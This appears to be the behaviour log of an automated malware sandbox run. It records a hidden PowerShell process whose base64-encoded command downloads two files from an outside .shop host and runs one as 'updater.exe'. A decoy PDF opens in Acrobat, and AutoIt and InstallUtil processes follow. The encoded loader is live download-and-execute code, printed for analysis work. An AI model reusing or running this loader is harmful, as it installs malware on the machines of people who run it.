Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -WindowStyle Hidden -EncodedCommand JABhAEoAdwA3AD0AIgB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgA7ACQAawBOAHIAMwA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0AHsAWwBjAGgAYQByAF0AJABfAH0AfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKwAiAC4AYgBpAG4AIgA7ACQAagBYAHEANAA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAtAEMAaABpAGwAZABQAGEAdABoACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwB8AEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AFsAYwBoAGEAcgBdACQAXwB9ACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKQA7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAagBYAHEANAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAcABIAHQANgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAYQBKAHcANwA7ACQAcwBXAGYAMgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAawBOAHIAMwA7ACQAdgBQAGIAOQA9ACIAaAB0AHQAcABzADoALwAvAGMAbgBkAGUAZgAxAC4AZwByAGUAZQBuAC0AcABhAHQAaAB3AGEAeQBzAC4AcwBoAG8AcAAvAGEAcABpAC8AdQB6AC8ANwA1ADUAMgA5ADcAMwA2ADUAMAAvAHUALgBiAGkAbgAiADsAJAB4AFEAZAA1AD0AIgBoAHQAdABwAHMAOgAvAC8AYwBuAGQAZQBmADEALgBnAHIAZQBlAG4ALQBwAGEAdABoAHcAYQB5AHMALgBzAGgAbwBwAC8AYQBwAGkALwB1AHoALwA3ADUANQAyADkANwAzADYANQAwAC8AbgBuAG4ALgBiAGkAbgAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdgBQAGIAOQAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABIAHQANgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB4AFEAZAA1ACAALQBPAHUAdABGAGkAbABlACAAJABzAFcAZgAyACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABIAHQANgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHMAVwBmADIAOwAmACAAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgAKAAnAGUAJwArACcAeABpACcAKwAnAHQAJwApACAALQBqAG8AaQBuACAAJwAnACkAKQApAA==	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ref095vq842r70_3rd_party_authorisation_form.pdf"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\71532689\updater.exe "C:\Users\user\AppData\Local\Temp\71532689\updater.exe" C:\Users\user\AppData\Local\Temp\71532689\XPoaTdYD.bin	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,9604478035381720578,9467704426141136404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\ehcfdbh\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\ehcfdbh\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\ehcfdbh\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\ehcfdbh\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Source: C:\Windows\System32\OpenSSH\sftp.exe	Section loaded: libcrypto.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\sftp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\sftp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\sftp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\sftp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: libcrypto.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: imgutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
